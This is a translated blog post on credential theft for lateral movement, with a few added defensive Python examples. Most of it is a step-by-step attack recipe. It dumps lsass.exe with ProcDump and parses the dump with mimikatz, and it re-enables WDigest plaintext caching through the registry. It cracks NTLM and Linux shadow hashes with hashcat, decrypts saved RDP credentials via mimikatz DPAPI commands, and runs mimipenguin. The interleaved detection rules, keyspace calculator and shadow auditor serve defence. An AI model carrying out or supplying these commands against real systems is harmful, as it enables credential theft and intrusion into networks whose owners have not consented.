Intranet lateral movement: Windows & Linux memory offline reading, Hashcat cracking, and RDP & SSH stored-credential extraction

1. Introduction

  Regarding the SSH key issue, I originally wanted to summarize SSH key cracking and lateral movement methods first, but there are too few methods and uses for lateral movement in Linux systems online, and I have not seen any good article so far. Many posts do summarize the relevant knowledge points, but it still feels a bit confusing, so I will pause the Linux lateral movement method and will not summarize lateral movement in Linux for the time being.

  However, we can still talk about lateral movement in Linux, because from a system perspective there are really few lateral movement methods available in Linux. Under normal circumstances, most Linux exploitation uses middleware and other software installed on the Linux system to achieve lateral movement.

2. Windows system password extraction

  Starting with Windows Server 2012, in order to prevent the leakage of plaintext passwords, Microsoft released patch KB2871997, which turns off the WDigest function. That is to say, when the system is Windows 10 or Windows Server 2012 or above, plaintext passwords are not stored in the memory cache by default.

2.1. Online reading

  Online reading here means using the tools that come with CS (Cobalt Strike) to capture hashes and read plaintext passwords. However, you can see here that only the hash value can be read, not the plaintext password.


  At the same time, you can see that all password positions are null, that is, empty. Is there really no password? In fact, it is the Windows Server 2012 version that prevents the plaintext from being read.


2.2. Offline reading

  Generally speaking, if you use mimikatz directly on the target it will be killed by antivirus. In this case we can use Microsoft's official tool to dump the memory, mainly to avoid being killed while reading the password. Since this tool is a Microsoft tool, it is not flagged and is not killed.

  ProcDump

  mimikatz

2.2.1. Reading without storage

  Reading without storage here is almost the same as above: under normal reading conditions, the plaintext password cannot be read.

2.2.1.1. Reading files

  Here you first need to upload the tool to the Windows Server 2012 machine and run it. Export the dump file, and then use mimikatz to read it.

Procdump64.exe -accepteula -ma lsass.exe lsass.dmp


2.2.1.2. Local decryption

  When the above command is executed, a file named lsass.dmp will appear in the current directory. Of course, the name is chosen by myself, but the suffix is certain.

  Here we run mimikatz on the local file, import the dump, and read it. This avoids the risk of being killed. However, the plaintext password still cannot be read here; only the hash value is read.

mimikatz.exe "sekurlsa::minidump lsass.dmp"
sekurlsa::logonPasswords full


2.2.2. Reading with storage

  The operations of reading with storage and reading without storage are the same. The only difference is that the administrator needs to log in. Since I used the DC, which is Windows Server 2012, for my demonstration, I could not log in with the activated administrator account, so there is no demonstration.

  Generally speaking, they are exactly the same. Here I put a picture from someone else.


2.3. Solving the high-version problem

  I have always said that higher versions cannot read plaintext passwords, so what should be done? In fact, this can be achieved by modifying the registry, then forcing a screen lock and waiting for the administrator to log in again with the account password.

2.3.1. Modify the registry

reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\ /v UseLogonCredential /t REG_DWORD /d 1


2.3.2. Log in again

  Here we lock the screen, log in again, and then grab the password. You can see that the password has been obtained successfully.

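From the defender's side, the two steps above (the registry change in 2.3.1 and the ProcDump/mimikatz dump in 2.2) each leave a distinct trace. The following is an added example, not code from the original post: it runs three detection rules over a few constructed, simplified JSON renderings of Sysmon Event ID 13 (registry value set), 10 (process access) and 1 (process create). Real Sysmon records are XML in the Windows event log, so the JSON layout is an assumption, though the field names follow Sysmon's schema; the allow-list of processes that may open lsass.exe is also an assumed baseline.

```python
"""Detecting the WDigest change and the LSASS dump described above.

Added example, not from the original post. SAMPLE_EVENTS are constructed
for illustration; the JSON layout is an assumption modelled on Sysmon's
Event ID 13, 10 and 1 fields.
"""
import json
import re

# Registry value that re-enables plaintext caching (the command in 2.3.1).
WDIGEST_VALUE = "securityproviders\\wdigest\\uselogoncredential"

# PROCESS_VM_READ: reading another process's memory needs this bit; a full
# dump such as ProcDump's -ma requests far more (0x1FFFFF).
PROCESS_VM_READ = 0x10

# System processes that open lsass.exe during normal operation. Assumed
# baseline, to be tuned per environment.
LSASS_ALLOW_LIST = {
    "c:\\windows\\system32\\csrss.exe",
    "c:\\windows\\system32\\wininit.exe",
    "c:\\windows\\system32\\services.exe",
}

# Command-line fragments taken from the page's own dump and parse steps.
LSASS_CMDLINE = re.compile(r"-ma\s+lsass|sekurlsa::minidump|sekurlsa::logonpasswords", re.I)

# Constructed sample events (one JSON object per line).
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"EventID": 13, "Image": "C:\\Windows\\System32\\reg.exe",
     "TargetObject": "HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\\UseLogonCredential",
     "Details": "DWORD (0x00000001)"},
    {"EventID": 10, "SourceImage": "C:\\Windows\\System32\\csrss.exe",
     "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": "C:\\Users\\Administrator\\Desktop\\Procdump64.exe",
     "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 1, "Image": "C:\\Users\\Administrator\\Desktop\\Procdump64.exe",
     "CommandLine": "Procdump64.exe -accepteula -ma lsass.exe lsass.dmp"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
])


def detect(event_lines):
    """Return (rule, image) for every event that matches one of three rules."""
    alerts = []
    for raw in event_lines.splitlines():
        if not raw.strip():
            continue
        ev = json.loads(raw)
        eid = ev.get("EventID")
        if eid == 13:
            # Rule 1: UseLogonCredential set to 1 re-enables plaintext caching.
            target = ev.get("TargetObject", "").lower()
            value = re.search(r"0x([0-9A-Fa-f]+)", ev.get("Details", ""))
            if target.endswith(WDIGEST_VALUE) and value and int(value.group(1), 16) == 1:
                alerts.append(("wdigest_plaintext_enabled", ev.get("Image", "")))
        elif eid == 10 and ev.get("TargetImage", "").lower().endswith("\\lsass.exe"):
            # Rule 2: a non-baseline process opened lsass.exe with memory-read rights.
            source = ev.get("SourceImage", "")
            granted = int(ev.get("GrantedAccess", "0x0"), 16)
            if granted & PROCESS_VM_READ and source.lower() not in LSASS_ALLOW_LIST:
                alerts.append(("lsass_memory_access", source))
        elif eid == 1 and LSASS_CMDLINE.search(ev.get("CommandLine", "")):
            # Rule 3: the dump or parse command line itself.
            alerts.append(("lsass_dump_commandline", ev.get("Image", "")))
    return alerts


if __name__ == "__main__":
    for rule, image in detect(SAMPLE_EVENTS):
        print(f"{rule:28} {image}")
```

On the sample input the csrss.exe access is suppressed by the allow-list and the other three events each produce one alert. Beyond detection, the registry value itself should be kept at 0 and monitored, and LSA protection (RunAsPPL) or Credential Guard prevents an ordinary user-mode dumper from obtaining the lsass.exe handle in the first place.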

2.4. HASH cracking

  Of course, the hash values can also be cracked here.

2.4.1. Online cracking

  Online cracking means cracking through some online websites, but some of them require payment.

https://www.somd5.com/
https://www.cmd5.com/


2.4.2. Local cracking

  As for local cracking, a very large dictionary is required, and in some cases powerful CPUs and GPUs are required for the computation.

  Hashcat is a tool for cracking passwords by brute force on the graphics card. It supports almost all common hash and encryption formats and supports various password combinations. It comes bundled with Kali Linux and also supports the Windows and Mac platforms.

  Here we will only briefly talk about usage. You can search online for specific usage, or I will write a dedicated summary later! Also note that the download is still very slow even when I use a proxy, so you need to wait.

  hashcat

2.4.2.1. Dictionary cracking

  Here you need to copy the hash value and prepare the password dictionary. Cracking speed mainly depends on the performance of the computer.

hashcat.exe -a 0 -m 1000 hash.txt pass.txt


2.4.2.2. Brute force cracking

  Brute-force cracking can succeed, but it requires very high CPU and GPU computation, especially for long and complex passwords. The following are the password combination options.

-m hash type
-a attack mode
?l lowercase letters
?s symbols
?d digits

  Here we need to know how many characters the password has, whether the first character is uppercase or lowercase, and whether the second character is a digit or a letter. I always feel something is wrong: in actual combat, how would I know whether the first character is a digit, a letter, uppercase or lowercase? There are many combinations.

  For example, my admin@123 is the fully ideal case. It is written as follows:

hashcat.exe -a 3 -m 1000 579da618cfbfa85247acf1f800a280a4 ?l?l?l?l?l?s?d?d?d

  If it refuses to run, just delete the record of the password cracked in the test above.

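The author's doubt above is the right one: a mask attack is only cheap when the password's structure is known. The following added example (not from the original post) makes that concrete by computing the keyspace of a hashcat -a 3 mask from its built-in charsets and comparing the page's mask with an unstructured mask of the same length. It supports literal characters and "??" as hashcat does; custom charsets (-1 .. -4) are accepted only as plain strings of literal characters, which is a simplification, and the 10 GH/s rate used in the demonstration is an illustrative placeholder, not a measurement.

```python
"""Keyspace and time estimates for hashcat -a 3 masks.

Added example, not from the original post. Models hashcat's built-in
charsets and literal mask characters; custom charsets are taken as plain
strings of literal characters (an assumption).
"""

# Sizes of hashcat's built-in charsets (?l lowercase, ?u uppercase, ?d digit,
# ?s symbol, ?a all printable ASCII, ?h/?H hex, ?b every byte value).
BUILTIN_CHARSETS = {"l": 26, "u": 26, "d": 10, "s": 33, "a": 95,
                    "h": 16, "H": 16, "b": 256}


def mask_keyspace(mask, custom=None):
    """Return how many candidates the mask enumerates.

    A '?x' token is one position drawn from charset x, '??' is a literal
    question mark, and any other character is a fixed literal.
    """
    custom = custom or {}
    total = 1
    i = 0
    while i < len(mask):
        if mask[i] != "?":
            i += 1                      # literal character: one possibility
            continue
        if i + 1 >= len(mask):
            raise ValueError("mask ends with a dangling '?'")
        sel = mask[i + 1]
        if sel == "?":
            size = 1                    # escaped literal '?'
        elif sel in BUILTIN_CHARSETS:
            size = BUILTIN_CHARSETS[sel]
        elif sel in custom:
            size = len(set(custom[sel]))  # custom charset given as literal chars
        else:
            raise ValueError(f"unknown charset ?{sel}")
        total *= size
        i += 2
    return total


def crack_time_seconds(mask, hashes_per_second, custom=None):
    """Worst-case seconds to exhaust the mask at the given hash rate."""
    return mask_keyspace(mask, custom) / hashes_per_second


def report(masks, hashes_per_second):
    """(mask, keyspace, seconds) for each mask, for comparing attack plans."""
    return [(m, mask_keyspace(m), crack_time_seconds(m, hashes_per_second))
            for m in masks]


if __name__ == "__main__":
    ASSUMED_RATE = 1e10   # illustrative 10 GH/s; real rates depend on hardware and hash type
    plans = [
        "?l?l?l?l?l?s?d?d?d",   # the page's mask, fitted to admin@123
        "?a?a?a?a?a?a?a?a?a",   # same length, no structure assumed
        "?a" * 12,              # three characters longer
    ]
    for mask, space, secs in report(plans, ASSUMED_RATE):
        print(f"{mask:30} {space:>28,d} candidates  ~{secs / 86400:,.1f} days")
```

At the assumed rate the page's fitted mask (about 3.9e11 candidates) is exhausted in well under a minute, while the same nine characters with no assumed structure (95^9, about 6.3e17) take on the order of two years, and each added character multiplies that by 95. For password policy this is the lesson: patterns like word+symbol+digits are what make mask attacks viable, and length does far more than composition rules.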

2.5. RDP credential capture

  RDP has an option to save credentials. Under normal circumstances, some administrators will check this option for convenience.


2.5.1. View connection records

  Here you can view the connection records with the following command.

cmdkey /list


2.5.2. Find local Credentials

  Record the value shown here.

dir /a %userprofile%\appdata\local\microsoft\credentials\*


2.5.3. Find the guidMasterKey value

  Here you need to record the guidMasterKey value of the target's Credentials record; the path in front of it must be your own path. Do not copy and paste directly, otherwise an error will occur.

mimikatz dpapi::cred /in:C:\Users\Administrator\appdata\local\microsoft\credentials\6090C0FC3FE42D73866869883B167718


2.5.4. Record MasterKey

  Here you need to record the MasterKey corresponding to the guidMasterKey.

mimikatz sekurlsa::dpapi


2.5.5. Decrypting tickets

  Look carefully at the commands here; they need to be combined with each other.

mimikatz dpapi::cred /in:C:\Users\Administrator\appdata\local\microsoft\credentials\6090C0FC3FE42D73866869883B167718 /masterkey:8a5b068bf179d5617421dc04bd2b310d319badf9d79421e7c0a9bf685317f23b1f7be9666983ca3af76939256c2267ba0d4ab600962e4940fcf09be61d101c1d


3. Linux system password extraction

  There are actually very few methods for extracting Linux system passwords, and the success rate is also low.

3.1. Password reading

  This may not succeed. Here I also got no response after running it.

  mimipenguin

chmod 755 ./mimipenguin.sh
./mimipenguin.sh


3.2. Password cracking

  Password cracking is actually the same as the Windows password cracking above.

3.2.1. Determine password type

  Here, the type is determined by looking at the root user's hash. I really couldn't find what encryption my y is.

  Determine the encryption type

cat /etc/shadow


3.2.2. Cracking by encryption form

Linux sha512crypt $6$, SHA512 (Unix) encryption:
hashcat -m 1800 sha512linux.txt p.txt
Linux sha256crypt $5$, SHA256 (Unix) encryption:
hashcat -m 7400 sha256linux.txt p.txt
Linux md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5) encryption:
hashcat -m 500 linuxmd5.txt p.txt
Linux bcrypt $2*$, Blowfish encryption:
hashcat -m 3200 linuxmd5.txt p.txt
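The scheme is encoded in the prefix between the first two "$" signs of the shadow field, so identifying it (3.2.1) and choosing the mode (3.2.2) can be done programmatically. The following added example, not from the original post, parses constructed /etc/shadow-style lines (the hash bodies are placeholder characters, not real hashes) and maps each prefix to the hashcat modes listed above. It goes slightly beyond the page: the "$y$" prefix the author could not identify is yescrypt, for which no mode is listed on the page, so it is reported with no mode; 13-character hashes with no prefix are classic DES crypt, which hashcat handles as mode 1500. Written from an audit perspective, it also flags locked accounts, accounts with an empty password field, and legacy md5crypt.

```python
"""Classify /etc/shadow password fields and map them to hashcat modes.

Added example, not from the original post. SAMPLE_SHADOW is constructed;
its hash bodies are placeholder characters and not real hashes.
"""
import re

# crypt(3) scheme identifiers -> (name, hashcat mode). Modes 1800, 7400,
# 500 and 3200 are the ones quoted on the page; yescrypt has none there.
HASHCAT_MODES = {
    "6": ("sha512crypt", 1800),
    "5": ("sha256crypt", 7400),
    "1": ("md5crypt", 500),
    "2a": ("bcrypt", 3200), "2b": ("bcrypt", 3200), "2y": ("bcrypt", 3200),
    "y": ("yescrypt", None),
}

# Schemes that are fast enough to be considered weak for stored passwords.
WEAK_SCHEMES = {"md5crypt", "descrypt"}

SAMPLE_SHADOW = """\
root:$6$rounds=5000$c0nstructed$0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijkl:19500:0:99999:7:::
alice:$y$j9T$c0nstructedSalt$0123456789abcdefghijklmnopqrstuvwxyzABCDEF:19500:0:99999:7:::
bob:$1$c0nstrct$0123456789abcdefghijkl:19500:0:99999:7:::
carol:$5$c0nstructed$0123456789abcdefghijklmnopqrstuvwxyzABCDEFG:19500:0:99999:7:::
dave:$2b$12$c0nstructedSaltc0nstruc0123456789abcdefghijklmnopqrstuvw:19500:0:99999:7:::
daemon:*:19500:0:99999:7:::
guest::19500:0:99999:7:::
"""


def classify(field):
    """Describe one shadow password field: scheme, hashcat mode, locked, empty."""
    if field == "":
        return {"scheme": "empty", "mode": None, "locked": False, "empty": True}
    locked = field.startswith(("!", "*"))     # "!" or "*" prefix disables password login
    body = field.lstrip("!")
    if body == "" or body.startswith("*"):
        return {"scheme": "none", "mode": None, "locked": True, "empty": False}
    m = re.match(r"^\$([^$]+)\$", body)
    if m:
        scheme, mode = HASHCAT_MODES.get(m.group(1), ("unknown", None))
    elif re.fullmatch(r"[./0-9A-Za-z]{13}", body):
        scheme, mode = "descrypt", 1500        # legacy DES crypt, no "$" prefix
    else:
        scheme, mode = "unknown", None
    return {"scheme": scheme, "mode": mode, "locked": locked, "empty": False}


def audit_shadow(text):
    """Return (user, scheme, mode, flag) per line, flag in ok/weak-scheme/locked/no-password."""
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        user, field = line.split(":", 2)[:2]
        info = classify(field)
        if info["empty"]:
            flag = "no-password"
        elif info["locked"]:
            flag = "locked"
        elif info["scheme"] in WEAK_SCHEMES:
            flag = "weak-scheme"
        else:
            flag = "ok"
        findings.append((user, info["scheme"], info["mode"], flag))
    return findings


if __name__ == "__main__":
    for user, scheme, mode, flag in audit_shadow(SAMPLE_SHADOW):
        print(f"{user:8} {scheme:12} mode={mode!s:6} {flag}")
```

On the sample, bob's md5crypt hash and guest's empty password field are the two findings an administrator should act on; the others are either strong schemes or accounts with password login disabled.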

3.3. SSH keys

  There is still room for a summary of SSH keys at the end. Personally, I feel it is quite complicated and I am still understanding it.


Origin blog.csdn.net/weixin_44268918/article/details/132198123